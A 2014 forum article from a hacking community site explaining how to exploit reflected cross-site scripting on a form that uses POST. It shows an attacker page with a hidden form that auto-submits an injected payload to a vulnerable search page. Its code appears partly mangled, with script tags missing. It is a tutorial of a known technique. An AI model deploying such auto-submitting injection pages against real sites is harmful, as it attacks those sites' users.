Thursday, April 24, 2014 Login · Register
    Login
Username

Password


Remember Me

Not a member yet?
Click here to register.

Forgotten your password?
Request a new one here.

 

    Users Online
  • · Members on IRC: 53   
  • · Total Members: 14,553
  • · Newest Member: bukovinai
  •  

     

        Related Ads
     

     

     

        Top 10 Forum Posters
    UserPosts
    bluechill1411   
    madf0x1277   
    cruizrisner1057   
    Qwexotic1034   
    Null Set869   
    auditorsec603   
    Override602   
    godofcereal599   
    TurboBorland585   
    Teddy469   
     

        Affiliates




  • iExploit


  • iExploit


  • WeChall





  • Thisislegal.com

  •  

        Related Ads
     

    View Thread
         
    Security Override The Articles Section [ General ] Articles
    XSS and post method
    Register FAQ Members List Today's Posts Search

    Print Thread
    01-30-2014 09:44 PM XSS and post method
    XSS and post methods
    When a webpage uses the GET method to submit user inputs through a form, XSS is easily executed, by constructing a url for example like http://www.xssvulnsite.com/index.asp?q=">alert("XSS"). But when a webpage uses the POST method it is not possible to craft such an url, using it as a link, because the page doesnt use the url to send the user inputs to the form. Although it is still possible to achieve XSS vulnerability exploitation.
    So lets suppose one more time vulnerable site http://www.xssvulnsite.com/ using a form to search or submit data. Very synoptic html code:

    Download source  GeSHi: HTML
    1
    2
    3
    4
    5
    <form name="formX" method="post" action="/search.asp">
    <input type="text" name="search_keyword" value="">
    <input type="submit" value="submit">
    </form>
     
    Parsed in 0.009 seconds, using GeSHi 1.0.8.6

    To exploit XSS vulnerability we can use an indirect way. So another file will be written and then loaded to another page, lets say the file hack.html and the page http://www.redirectingpage.com/hack.html
    What are its contents?
    In the hack.html file the following code will be written
    Download source  GeSHi: HTML
    1
    2
    3
    4
    5
    6
    7
     
    <form method="post" action="http://www.xssvulnsite.com/search.asp" name="formX">
    <input type="hidden" name="search_keyword" value='><img src="http://www.offensivephotos/offensivephoto.jpg">'>
    </form>
     
    setTimeout(formX.submit(),1);
     
    Parsed in 0.007 seconds, using GeSHi 1.0.8.6

    We can see that we are using the parameters of the original form to the form of the redirecting, a hidden form and in value a script, wanted to be executed, a photo, text, whatever we like to use in XSS hole.
    Follows a script that when opens the middle page loads the XSSed vulnerable page after 1msec.
     
    Offline
    Jump to Forum:
    Forum powered by fusionBoard